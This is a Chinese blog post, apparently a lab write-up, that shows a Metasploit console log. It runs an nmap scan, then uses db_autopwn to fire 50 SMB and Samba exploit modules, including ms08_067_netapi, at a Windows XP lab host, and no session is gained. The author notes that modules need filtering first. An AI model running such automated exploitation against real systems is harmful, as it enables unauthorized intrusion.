metasploit之db_autopwn实战

msf > db_nmap -O 192.168.1.142
[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2013-05-14 20:12 EDT
[*] Nmap: Nmap scan report for 192.168.1.142
[*] Nmap: Host is up (0.00047s latency).
[*] Nmap: Not shown: 997 filtered ports
[*] Nmap: PORT     STATE  SERVICE
[*] Nmap: 139/tcp  open   netbios-ssn
[*] Nmap: 445/tcp  open   microsoft-ds
[*] Nmap: 2869/tcp closed icslap
[*] Nmap: MAC Address: 00:0C:29:F1:31:D2 (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running (JUST GUESSING): Microsoft Windows XP|2003|2000 (99%)
[*] Nmap: Aggressive OS guesses: Microsoft Windows XP SP3 (99%), Microsoft Windows XP (97%), Microsoft Windows Server 2003 SP1 or SP2 (97%), Microsoft Windows Server 2003 SP2 (97%), Microsoft Windows 2000 SP4 (95%), Microsoft Windows XP SP2 (95%), Microsoft Windows XP SP2 or SP3 (95%), Microsoft Windows Small Business Server 2003 (95%), Microsoft Windows XP Professional SP2 (95%), Microsoft Windows 2000 SP0 (95%)
[*] Nmap: No exact OS matches for host (test conditions non-ideal).
[*] Nmap: Network Distance: 1 hop
[*] Nmap: OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 9.48 seconds
msf > hosts

Hosts
=====

address        mac                name  os_name            os_flavor  os_sp  purpose  info  comments
-------        ---                ----  -------            ---------  -----  -------  ----  --------
192.168.1.142  00:0C:29:F1:31:D2        Microsoft Windows  XP                device         

msf > db_autopwn -p -t -e
[*] Analysis completed in 7 seconds (0 vulns / 0 refs)
[*] 
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   192.168.1.142:139  exploit/freebsd/samba/trans2open  (port match)
[*]   192.168.1.142:139  exploit/linux/samba/chain_reply  (port match)
[*]   192.168.1.142:139  exploit/linux/samba/lsa_transnames_heap  (port match)
[*]   192.168.1.142:139  exploit/linux/samba/trans2open  (port match)
[*]   192.168.1.142:139  exploit/multi/samba/nttrans  (port match)
[*]   192.168.1.142:139  exploit/multi/samba/usermap_script  (port match)
[*]   192.168.1.142:139  exploit/netware/smb/lsass_cifs  (port match)
[*]   192.168.1.142:139  exploit/osx/samba/lsa_transnames_heap  (port match)
[*]   192.168.1.142:139  exploit/solaris/samba/trans2open  (port match)
[*]   192.168.1.142:139  exploit/windows/brightstor/ca_arcserve_342  (port match)
[*]   192.168.1.142:139  exploit/windows/brightstor/etrust_itm_alert  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms03_049_netapi  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms04_011_lsass  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms04_031_netdde  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms05_039_pnp  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms06_040_netapi  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms06_066_nwapi  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms06_066_nwwks  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms06_070_wkssvc  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms07_029_msdns_zonename  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms08_067_netapi  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms10_061_spoolss  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/netidentity_xtierrpcpipe  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/psexec  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/timbuktu_plughntcommand_bof  (port match)
[*]   192.168.1.142:445  exploit/freebsd/samba/trans2open  (port match)
[*]   192.168.1.142:445  exploit/linux/samba/chain_reply  (port match)
[*]   192.168.1.142:445  exploit/linux/samba/lsa_transnames_heap  (port match)
[*]   192.168.1.142:445  exploit/linux/samba/trans2open  (port match)
[*]   192.168.1.142:445  exploit/multi/samba/nttrans  (port match)
[*]   192.168.1.142:445  exploit/multi/samba/usermap_script  (port match)
[*]   192.168.1.142:445  exploit/netware/smb/lsass_cifs  (port match)
[*]   192.168.1.142:445  exploit/osx/samba/lsa_transnames_heap  (port match)
[*]   192.168.1.142:445  exploit/solaris/samba/trans2open  (port match)
[*]   192.168.1.142:445  exploit/windows/brightstor/ca_arcserve_342  (port match)
[*]   192.168.1.142:445  exploit/windows/brightstor/etrust_itm_alert  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms03_049_netapi  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms04_011_lsass  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms04_031_netdde  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms05_039_pnp  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms06_040_netapi  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms06_066_nwapi  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms06_066_nwwks  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms06_070_wkssvc  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms07_029_msdns_zonename  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms08_067_netapi  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms10_061_spoolss  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/netidentity_xtierrpcpipe  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/psexec  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/timbuktu_plughntcommand_bof  (port match)
[*] ================================================================================
[*] 
[*] 
[*] (1/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.1.142:139...
[*] (2/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.1.142:139...
[*] (3/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.142:139...
[*] (4/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.1.142:139...
[*] (5/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.142:139...
[*] (6/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.142:139...
[*] (7/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.142:139...
[*] (8/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.142:139...
[*] (9/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.142:139...
[*] (10/50 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.142:139...
[*] (11/50 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.142:139...
[*] (12/50 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.142:139...
[*] (13/50 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.142:139...
[*] (14/50 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.142:139...
[*] (15/50 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.142:139...
[*] (16/50 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.142:139...
[*] (17/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.142:139...
[*] (18/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.142:139...
[*] (19/50 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.142:139...
[*] (20/50 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.1.142:139...
[*] (21/50 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.142:139...
[*] (22/50 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.1.142:139...
[*] (23/50 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.142:139...
[*] (24/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.142:139...
[*] (25/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.142:139...
[*] (26/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.1.142:445...
[*] (27/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.1.142:445...
[*] (28/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.142:445...
[*] (29/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.1.142:445...
[*] (30/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.142:445...
[*] (31/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.142:445...
[*] (32/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.142:445...
[*] (33/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.142:445...
[*] (34/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.142:445...
[*] (35/50 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.142:445...
[*] (36/50 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.142:445...
[*] (37/50 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.142:445...
[*] (38/50 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.142:445...
[*] (39/50 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.142:445...
[*] (40/50 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.142:445...
[*] (41/50 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.142:445...
[*] (42/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.142:445...
[*] (43/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.142:445...
[*] (44/50 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.142:445...
[*] (45/50 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.1.142:445...
[*] (46/50 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.142:445...
[*] (47/50 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.1.142:445...
[*] (48/50 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.142:445...
[*] (49/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.142:445...
[*] (50/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.142:445...
[*] (50/50 [0 sessions]): Waiting on 25 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 14 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 11 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 8 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 8 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 0 launched modules to finish execution...
[*] The autopwn command has completed with 0 sessions

msf > 


实战对象是XP SP3,如果单独使用ms08_067_netapi,是可以成功exploit的。但是,自动化后,就不行了。

db_autopwn前,应该对module进行过滤。

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值